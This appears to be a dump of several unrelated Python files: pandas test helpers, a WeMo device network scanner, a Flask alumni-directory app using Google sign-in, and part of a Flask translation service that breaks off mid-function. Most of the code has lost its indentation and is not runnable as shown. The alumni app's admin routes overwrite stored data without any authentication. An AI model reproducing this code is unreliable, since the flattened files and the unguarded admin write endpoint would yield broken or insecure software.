The URL to try to connect to
error_classes : tuple of Exception, optional
The exception classes that count as a failed connection. Defaults to
the classes returned by _get_default_network_errors().
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.errno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network only fail (instead of being skipped) when it
is possible to make a network connection to the check URL (defaults to
google.com)::
>>> from pandas.util.testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback (most recent call last):
...
URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as e:
errno = getattr(e, "errno", None)
if not errno and hasattr(e, "reason"):
errno = getattr(e.reason, "errno", None)
if errno in skip_errnos:
skip(
"Skipping test due to known errno"
" and error {error}".format(error=e)
)
e_str = str(e)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
"Skipping test because exception "
"message is known and error {error}".format(error=e)
)
if not isinstance(e, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(
"Skipping test due to lack of connectivity"
" and error {error}".format(error=e)
)
return wrapper
with_connectivity_check = network
def assert_raises_regex(_exception, _regexp, _callable=None, *args, **kwargs):
r"""
Check that the specified Exception is raised and that the error message
matches a given regular expression pattern. This may be a regular
expression object or a string containing a regular expression suitable
for use by `re.search()`. This is a port of the `assertRaisesRegexp`
function from unittest in Python 2.7.
.. deprecated:: 0.24.0
Use `pytest.raises` instead.
Examples
--------
>>> assert_raises_regex(ValueError, 'invalid literal for.*XYZ', int, 'XYZ')
>>> import re
>>> assert_raises_regex(ValueError, re.compile('literal'), int, 'XYZ')
If an exception of a different type is raised, it bubbles up.
>>> assert_raises_regex(TypeError, 'literal', int, 'XYZ')
Traceback (most recent call last):
...
ValueError: invalid literal for int() with base 10: 'XYZ'
>>> dct = dict()
>>> assert_raises_regex(KeyError, 'pear', dct.__getitem__, 'apple')
Traceback (most recent call last):
...
AssertionError: "pear" does not match "'apple'"
You can also use this in a with statement.
>>> with assert_raises_regex(TypeError, r'unsupported operand type\(s\)'):
... 1 + {}
>>> with assert_raises_regex(TypeError, 'banana'):
... 'apple'[0] = 'b'
Traceback (most recent call last):
...
AssertionError: "banana" does not match "'str' object does not support \
item assignment"
"""
warnings.warn(
(
"assert_raises_regex has been deprecated and will "
"be removed in the next release. Please use "
"`pytest.raises` instead."
),
FutureWarning,
stacklevel=2,
)
manager = _AssertRaisesContextmanager(exception=_exception, regexp=_regexp)
if _callable is not None:
with manager:
_callable(*args, **kwargs)
else:
return manager
class _AssertRaisesContextmanager:
"""
Context manager behind `assert_raises_regex`.
"""
def __init__(self, exception, regexp=None):
"""
Initialize an _AssertRaisesContextManager instance.
Parameters
----------
exception : class
The expected Exception class.
regexp : str, default None
The regex to compare against the Exception message.
"""
self.exception = exception
if regexp is not None and not hasattr(regexp, "search"):
regexp = re.compile(regexp, re.DOTALL)
self.regexp = regexp
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, trace_back):
expected = self.exception
if not exc_type:
exp_name = getattr(expected, "__name__", str(expected))
raise AssertionError("{name} not raised.".format(name=exp_name))
return self.exception_matches(exc_type, exc_value, trace_back)
def exception_matches(self, exc_type, exc_value, trace_back):
"""
Check that the Exception raised matches the expected Exception
and expected error message regular expression.
Parameters
----------
exc_type : class
The type of Exception raised.
exc_value : Exception
The instance of `exc_type` raised.
trace_back : stack trace object
The traceback object associated with `exc_value`.
Returns
-------
is_matched : bool
Whether or not the Exception raised matches the expected
Exception class and expected error message regular expression.
Raises
------
AssertionError : The error message provided does not match
the expected error message regular expression.
"""
if issubclass(exc_type, self.exception):
if self.regexp is not None:
val = str(exc_value)
if not self.regexp.search(val):
msg = '"{pat}" does not match "{val}"'.format(
pat=self.regexp.pattern, val=val
)
e = AssertionError(msg)
raise_with_traceback(e, trace_back)
return True
else:
# Failed, so allow Exception to bubble up.
return False
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
clear=None,
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
clear : str, default None
If not ``None`` then remove any previously raised warnings from
the ``__warningsregistry__`` to ensure that no warning messages are
suppressed by this context manager. If ``None`` is specified,
the ``__warningsregistry__`` keeps track of which warnings have been
shown, and does not show them again.
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show where the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
.. warning:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
if clear is not None:
# make sure that we are clearing these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [clear]
for m in clear:
try:
m.__warningregistry__.clear()
except AttributeError:
# module may not have __warningregistry__
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
"File where warning is raised: {actual} != "
"{caller}. Warning message: {message}"
).format(
actual=actual_warning.filename,
caller=caller.filename,
message=actual_warning.message,
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = "Did not see expected warning of class {name!r}.".format(
name=expected_warning.__name__
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
"Caused unexpected warning(s): {!r}.".format(extra_warnings)
)
class RNGContext:
"""
Context manager to set the numpy random number generator seed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
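# --- Editor's illustrative sketch (not part of the original module) ---
# Registers a temporary "piped" dialect, parses with it through read_csv's
# `dialect` option, and relies on the context manager to unregister it.
def _example_with_csv_dialect():
    from io import StringIO

    data = "a|b\n1|2\n"
    with with_csv_dialect("piped", delimiter="|"):
        df = pd.read_csv(StringIO(data), dialect="piped")
    assert list(df.columns) == ["a", "b"]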
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
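# --- Editor's illustrative sketch (not part of the original module) ---
# Runs the decorated function on three threads at once; return values are
# discarded, so the effect is observed through the shared list.
def _example_test_parallel():
    results = []

    @test_parallel(num_threads=3)
    def record():
        results.append(1)

    record()
    assert len(results) == 3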
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz):
"""Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
skipna_wrapper : function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
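# --- Editor's illustrative sketch (not part of the original module) ---
# The returned wrapper drops NaNs before applying `alternative`, mirroring
# a reduction called with skipna=True.
def _example_make_skipna_wrapper():
    wrapper = _make_skipna_wrapper(np.sum)
    s = Series([1.0, np.nan, 2.0])
    assert wrapper(s) == 3.0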
def convert_rows_list_to_csv_str(rows_list):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : list
The list of string. Each element represents the row of csv.
Returns
-------
expected : string
Expected output of to_csv() in current OS
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
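# --- Editor's illustrative sketch (not part of the original module) ---
# Joins the rows with the OS line separator, matching what to_csv() writes.
def _example_convert_rows_list_to_csv_str():
    expected = convert_rows_list_to_csv_str(["a,b", "1,2"])
    assert expected == "a,b" + os.linesep + "1,2" + os.linesep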
|
discover.py
|
import ipaddress
import time
from os import getenv
from threading import Thread
from . import worker
def get_devices():
print('Finding WeMo devices...')
workers = worker.Workers(10, worker.ScanWorker, scan_timeout=2, connect_timeout=30, port=49153)
workers.start()
for addr in ipaddress.IPv4Network(getenv('NET_SPACE')):
workers.put(addr.exploded)
workers.send_stop()
devices = workers.wait()
print(f'Found {len(devices)} device(s)')
return devices
class DiscoveryWorker:
def __init__(self):
self.devices = []
self.thread = None
self.last_update = None
def _loop(self):
while True:
self.devices = get_devices()
self.last_update = time.time()
time.sleep(20)
def run(self):
t = Thread(target=self._loop, daemon=True)
t.start()
self.thread = t
|
app.py
|
import json
import os
import threading
import urllib.parse
import flask
import flask_talisman
import google.auth.transport.requests
import google.oauth2.id_token
import sheets
import sessions
ADMIN_ENABLED = bool(os.environ.get("LAM_ADMIN_ENABLED"))
ANALYTICS_ENABLED = bool(os.environ.get("LAM_ANALYTICS_ENABLED"))
AUTOFETCH_ENABLED = bool(os.environ.get("LAM_AUTOFETCH_ENABLED"))
TLS_ENABLED = bool(os.environ.get("LAM_TLS_ENABLED"))
app = flask.Flask(__name__, template_folder=".")
if TLS_ENABLED:
flask_talisman.Talisman(app, content_security_policy=None)
@app.route("/")
def get_index():
return flask.render_template("dist/index.html", analytics_enabled=ANALYTICS_ENABLED)
@app.route("/oauth")
def get_oauth_redirect():
return flask.send_file("dist/oauth.html")
@app.route("/admin")
def get_admin():
if ADMIN_ENABLED:
return flask.send_file("dist/admin.html")
else:
return "Admin dashboard not enabled", 403
@app.route("/<path>")
def get_static_file(path):
if not path.endswith(".html"):
return flask.send_from_directory("dist", path)
flask.abort(404)
@app.route("/api/v1/admin/data")
def get_admin_data():
if ADMIN_ENABLED:
try:
with open("data.json") as f:
return flask.jsonify(json.load(f))
except (OSError, json.JSONDecodeError):
return "Data not available", 500
else:
return "Admin dashboard not enabled", 403
@app.route("/api/v1/admin/data", methods=["POST"])
def set_admin_data():
if ADMIN_ENABLED:
try:
data = flask.request.get_json()
with open("data.json.tmp", "w") as f:
json.dump(data, f)
os.rename("data.json.tmp", "data.json")
return "Wrote data successfully", 200
except OSError:
return "Failed to write data", 500
else:
return "Admin dashboard not enabled", 403
@app.route("/api/v1/admin/download", methods=["POST"])
def admin_download():
if ADMIN_ENABLED:
try:
sheets.download_form_responses()
return "Downloaded data successfully", 200
except Exception as e:
return f"Failed to download data: {e}", 500
else:
return "Admin dashboard not enabled", 403
@app.route("/api/v1/admin/upload", methods=["POST"])
def admin_upload():
if ADMIN_ENABLED:
try:
sheets.upload_form_responses()
return "Uploaded data successfully", 200
except Exception as e:
return f"Failed to upload data: {e}", 500
else:
return "Admin dashboard not enabled", 403
PUBLIC_KEYS = {
"city",
"cityLat",
"cityLong",
"comments",
"country",
"facebookProfile",
"email",
"major",
"name",
"org",
"orgLat",
"orgLink",
"orgLong",
"path",
"phoneNumber",
"state",
"summerCity",
"summerCityLat",
"summerCityLong",
"summerCountry",
"summerOrg",
"summerOrgLat",
"summerOrgLink",
"summerOrgLong",
"summerPlans",
"summerState",
}
@app.route("/api/v1/data", methods=["POST"])
def get_data():
try:
token = flask.request.json["oauthToken"]
if not isinstance(token, str):
raise TypeError
except (KeyError, TypeError, json.JSONDecodeError):
return "Request did not include token", 400
email = sessions.check_token(token)
if not email:
try:
# This API call takes about 125ms in my testing. Could be
# optimized by doing our own JWT validation, probably. But
# that would really suck so let's hold off on that for
# now.
#
# https://developers.google.com/identity/sign-in/web/backend-auth
idinfo = google.oauth2.id_token.verify_oauth2_token(
token,
google.auth.transport.requests.Request(),
"548868103597-3th6ihbnejkscon1950m9mm31misvhk9.apps.googleusercontent.com",
)
if idinfo["iss"] not in (
"accounts.google.com",
"https://accounts.google.com",
):
raise ValueError("Wrong issuer: {}".format(idinfo["iss"]))
if idinfo["hd"] != "g.hmc.edu":
raise ValueError("Wrong domain: {}".format(idinfo["hd"]))
email = idinfo["email"]
sessions.add_token(token, email)
except ValueError as e:
# Be careful changing. This is a magic string for the front end
return "Bad token: {}".format(e), 401
try:
with open("data.json") as f:
responses = json.load(f)
return flask.jsonify(
{
"responses": [
{
"postGradEmail": r.get("postGradEmail", "")
or r.get("email", ""),
**{key: r.get(key, "") for key in PUBLIC_KEYS},
}
for r in responses
if r["processed"]
],
"email": email.replace("g.hmc.edu", "hmc.edu")
if not ADMIN_ENABLED
else "*",
}
)
except (OSError, json.JSONDecodeError):
return "Data not available", 500
@app.errorhandler(404)
def page_not_found(e):
return "Page not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "Internal server error", 500
if AUTOFETCH_ENABLED:
def start_autofetch():
try:
sheets.download_form_responses()
finally:
timer = threading.Timer(60, start_autofetch)
timer.daemon = True
timer.start()
threading.Thread(target=start_autofetch, daemon=True).start()
|
app.py
|
"""
* @author ['aroop']
* @email ['aroop.ghosh@tarento.com']
* @create date 2019-06-25 12:40:01
* @modify date 2019-06-25 12:40:01
* @desc [description]
"""
from flask import Flask, jsonify, request
import os
import glob
from datetime import datetime
import time
import logging
import math
import json
import uuid
import multiprocessing as mp
from flask_cors import CORS
import flask as flask
from models.status import Status
from models.response import CustomResponse
from logging.config import dictConfig
from db.conmgr import getinstance
from db.conmgr_mongo import connectmongo
from utils.pdftoimage import converttoimage
from utils.imagetotext import convertimagetotext
# from jaeger.middleware import LoggerMiddleware
from utils.imagetoalto import convertimagetoalto
from utils.removetextv2 import removetext
from utils.imagetopdf import converttopdf
from utils.translateandupdateimage import translateandupdateimage
from utils.process_paragraph import processhindi
from utils.process_paragraph_eng import processenglish
from utils.remove_page_number_filter import filtertext
from utils.separate import separate
from utils.translatewithgoogle import translatewithgoogle, translatesinglesentence
from utils.translatewithanuvada_eng import translatewithanuvadaeng
from models.words import savewords
from models.sentence_log import Sentencelog
from models.translation import Translation
from models.translation_process import TranslationProcess
from models.words import fetchwordsfromsentence
from models.sentence import Sentence
from models.corpus import Corpus
from models.benchmark import Benchmark
from controllers.admin_api import admin_api
from controllers.corpus import corpus_api
from controllers.document_api import document_api
from controllers.elastic_search_api import indexer_api
from controllers.file_converter import file_converter
from elastic_utils.elastic_search_indexer import sentence_creator
from utils.document_assembler import keep_on_running
from utils.document_writer import write_document
import threading
import atexit
from utils.thread_manager import thread_manager
from apscheduler.schedulers.background import BackgroundScheduler
from controllers.ner_annotation_api import ner_annotation_api
# from jaeger_client import Config
""" Logging Config, for debug logs please set env 'app_debug_logs' to True """
dictConfig({
'version': 1,
'formatters': {'default': {
'format': '[%(asctime)s] {%(filename)s:%(lineno)d} %(threadName)s %(levelname)s in %(module)s: %(message)s',
}},
'handlers': {
'info': {
'class': 'logging.FileHandler',
'level': 'DEBUG',
'formatter': 'default',
'filename': 'info.log'
},
'console': {
'class': 'logging.StreamHandler',
'level': 'DEBUG',
'formatter': 'default',
'stream': 'ext://sys.stdout',
}
},
'loggers': {
'file': {
'level': 'DEBUG',
'handlers': ['info', 'console'],
'propagate': ''
}
},
'root': {
'level': 'DEBUG',
'handlers': ['info', 'console']
}
})
LANGUAGES = {
'Hindi': 'hi',
'English': 'en',
'Bengali':'bn',
'Gujarati':'gu',
'Marathi':'mr',
'Kannada':'kn',
'Telugu':'te',
'Malayalam':'ml',
'Punjabi':'pa',
'Tamil': 'ta',
'Urdu': 'ur'
}
app = Flask(__name__)
# app.wsgi_app = LoggerMiddleware(app.wsgi_app)
CORS(app)
app.register_blueprint(corpus_api)
app.register_blueprint(admin_api)
app.register_blueprint(document_api)
app.register_blueprint(indexer_api)
app.register_blueprint(ner_annotation_api)
app.register_blueprint(file_converter)
UPLOAD_FOLDER = 'upload'
STATUS_PENDING = 'PENDING'
STATUS_PROCESSING = 'PROCESSING'
STATUS_PROCESSED = 'COMPLETED'
STATUS_EDITED = 'EDITED'
ES_SERVER_URL = 'http://localhost:9876/'
PROFILE_REQ_URL = ES_SERVER_URL + 'users/'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
es = getinstance()
words = []
connectmongo()
# config = Config(
# config={ # usually read from some yaml config
# 'sampler': {
# 'type': 'const',
# 'param': 1,
# },
# 'logging': True,
# },
# service_name='python-test',
# validate=True,
# )
# # this call also sets opentracing.tracer
# tracer = config.initialize_tracer()
# @app.before_request
# def before():
# global tracer
# print("Printing request")
# print(request.headers)
# with tracer.start_span('TestSpan') as span:
# span.log_kv({'event': 'test message', 'life': 42})
# pass
# @app.after_request
# def after(response):
# global tracer
# print("Printing response")
# print(response.status)
# print(response.headers)
# print(response.get_data())
# tracer.close()
# return response
# scheduler = BackgroundScheduler()
# scheduler.add_job(func=thread_manager, trigger="interval", minutes=2)
# scheduler.start()
# # Shut down the scheduler when exiting the app
# atexit.register(lambda: scheduler.shutdown())
log = logging.getLogger('file')
try:
app_debug_logs = os.environ['app_debug_logs']
if app_debug_logs == 'False':
logging.disable(logging.DEBUG)
log.info("DEBUG LOGS InACTIVE")
else:
log.info("DEBUG LOGS ACTIVE")
except:
logging.disable(logging.DEBUG)
log.info("DEBUG LOGS InACTIVE")
try:
t1 = threading.Thread(target=keep_on_running, name='keep_on_running')
t1.start()
# t2 = threading.Thread(target=write_document, name='write_document')
# t2.start()
# t3 = threading.Thread(target=sentence_creator, name='sentence_creator')
# t3.setDaemon(True)
# t3.start()
except Exception as e:
log.info('ERROR WHILE RUNNING CUSTOM THREADS '+str(e))
@app.route('/hello', methods=['GET'])
def hello_():
log.info('testing info log')
    log.debug('testing debug logs')
log.error('test error logs')
return "hello"
""" to get list of corpus available """
@app.route('/fetch-corpus', methods=['GET'])
def fetch_corpus():
if request.headers.get('ad-userid') is not None:
log.info('fetch_corpus: initiated by ' + request.headers.get('ad-userid'))
else:
log.info('fetch_corpus: initiated by anonymous user')
corpus = Corpus.objects.to_json()
res = CustomResponse(Status.SUCCESS.value, json.loads(corpus))
return res.getres()
""" to get all the process from mongo in order of insertion """
@app.route('/fetch-translation-process', methods=['GET'])
def fetch_translation_process():
log.info('fetch_translation_process : started at ' + str(getcurrenttime()))
    try:
        translationProcess = TranslationProcess.objects(created_by=request.headers.get('ad-userid')).order_by(
            '-basename').to_json()
        res = CustomResponse(Status.SUCCESS.value, json.loads(translationProcess))
    except:
        log.info('fetch_translation_process : ERROR occurred')
        res = CustomResponse(Status.FAILURE.value, None)
log.info('fetch_translation_process : ended at ' + str(getcurrenttime()))
return res.getres()
@app.route('/fetch-translation', methods=['GET'])
def fetch_translation():
basename = request.args.get('basename')
sentences = Translation.objects(basename=basename).to_json()
res = CustomResponse(Status.SUCCESS.value, json.loads(sentences))
return res.getres()
""" for translating source """
@app.route('/translate-source', methods=['GET'])
def translate_source():
sources = []
source = request.args.get('source')
basename = request.args.get('basename')
if source is None or basename is None:
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
sources.append(source)
corpus_obj = Corpus.objects(basename=basename)
corpus_dict = json.loads(corpus_obj.to_json())
target_lang = 'en'
if 'target_lang' in corpus_dict[0] and corpus_dict[0]['target_lang'] is not None:
target_lang = LANGUAGES[corpus_dict[0]['target_lang']]
translation_list = translatesinglesentence(sources, target_lang)
res = CustomResponse(Status.SUCCESS.value, translation_list)
return res.getres()
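def _demo_translate_source(base_url='http://localhost:5001'):
    # Hypothetical client sketch for the route above. Assumes the service is
    # reachable at base_url (the app below runs on port 5001) and that the
    # `requests` package is installed; the query parameters mirror what
    # translate_source() reads, and the basename value is only an example.
    import requests
    resp = requests.get(base_url + '/translate-source',
                        params={'source': 'example sentence',
                                'basename': '1561453201'})
    return resp.json()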
""" to get list of sentences for given corpus """
@app.route('/fetch-sentences', methods=['GET'])
def fetch_sentences():
global LANGUAGES
basename = request.args.get('basename')
totalcount = 0
(sentencesobj, totalcount) = Sentence.limit(request.args.get('pagesize'), basename, request.args.get('status'),
request.args.get('pageno'))
corpus_obj = Corpus.objects(basename=basename)
corpus_dict = json.loads(corpus_obj.to_json())
sentences_list = []
sources = []
if sentencesobj is not None:
for sent in sentencesobj:
sent_dict = json.loads(sent.to_json())
corpus = Sentence.objects(_id=sent_dict['_id']['$oid'])
if sent_dict['status'] == STATUS_PENDING:
corpus.update(set__status=STATUS_PROCESSING)
sources.append(sent_dict['source'])
target_lang = 'en'
if 'target_lang' in corpus_dict[0] and corpus_dict[0]['target_lang'] is not None:
target_lang = LANGUAGES[corpus_dict[0]['target_lang']]
translation_list = translatesinglesentence(sources, target_lang)
index = 0
for sent in sentencesobj:
sent_dict = json.loads(sent.to_json())
sent_dict['translation'] = translation_list[index]
sentences_list.append(sent_dict)
index += 1
# print()
# for sentence in sentencesobj:
# # sentence.update(set__status=STATUS_PROCESSING, set__locked=True, set__locked_time=datetime.now())
# sentence.update(set__status=STATUS_PROCESSING)
res = CustomResponse(Status.SUCCESS.value, sentences_list, totalcount)
return res.getres()
""" to update sentences present in corpus """
@app.route('/update-sentences', methods=['POST'])
def update_sentences():
body = request.get_json()
if (body['sentences'] is None or not isinstance(body['sentences'], list)):
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
for sentence in body['sentences']:
corpus = Sentence.objects(_id=sentence['_id']['$oid'])
corpus_dict = json.loads(corpus.to_json())
sentence_log = Sentencelog(source_words=corpus_dict[0]['source'].split(" "),
target_words=corpus_dict[0]['target'].split(" "),
source_edited_words=sentence['source'].split(" "),
updated_on=datetime.now(), edited_by=request.headers.get('ad-userid'),
parent_id=sentence['_id']['$oid'], target_edited_words=sentence['target'].split(" "),
basename=corpus_dict[0]['basename'], source=corpus_dict[0]['source'],
target=corpus_dict[0]['target'], source_edited=sentence['source'],
target_edited=sentence['target'])
sentence_log.save()
corpus.update(set__source=sentence['source'], set__target=sentence['target'], set__status=STATUS_EDITED)
res = CustomResponse(Status.SUCCESS.value, None)
return res.getres()
""" to update sentences grade in corpus """
@app.route('/update-sentences-grade', methods=['POST'])
def update_sentences_grade():
body = request.get_json()
if (body['sentences'] is None or not isinstance(body['sentences'], list)):
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
for sentence in body['sentences']:
corpus = Sentence.objects(_id=sentence['_id']['$oid'])
corpus.update(set__rating=sentence['rating'])
res = CustomResponse(Status.SUCCESS.value, None)
return res.getres()
""" to update sentences status present in corpus """
@app.route('/update-sentences-status', methods=['POST'])
def update_sentences_status():
body = request.get_json()
if (body['sentences'] is None or not isinstance(body['sentences'], list)):
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
for sentence in body['sentences']:
corpus = Sentence.objects(_id=sentence['_id']['$oid'])
corpus.update(set__status=sentence['status'])
res = CustomResponse(Status.SUCCESS.value, None)
return res.getres()
@app.route('/translate-file', methods=['POST'])
def translateFile():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
f = request.files['file']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '.pdf')
translationProcess = TranslationProcess(
status=STATUS_PROCESSING, name=f.filename, created_on=current_time, basename=basename)
translationProcess.save()
f.save(filepath)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, ''), callback=capturealtotext)
pool.close()
pool.join()
res = CustomResponse(Status.SUCCESS.value, '')
translationProcess = TranslationProcess.objects(basename=basename)
translationProcess.update(set__status=STATUS_PROCESSED)
return res.getres()
@app.route('/get-file-data', methods=['POST'])
def getfiledata():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
f = request.files['file']
filepath = os.path.join(
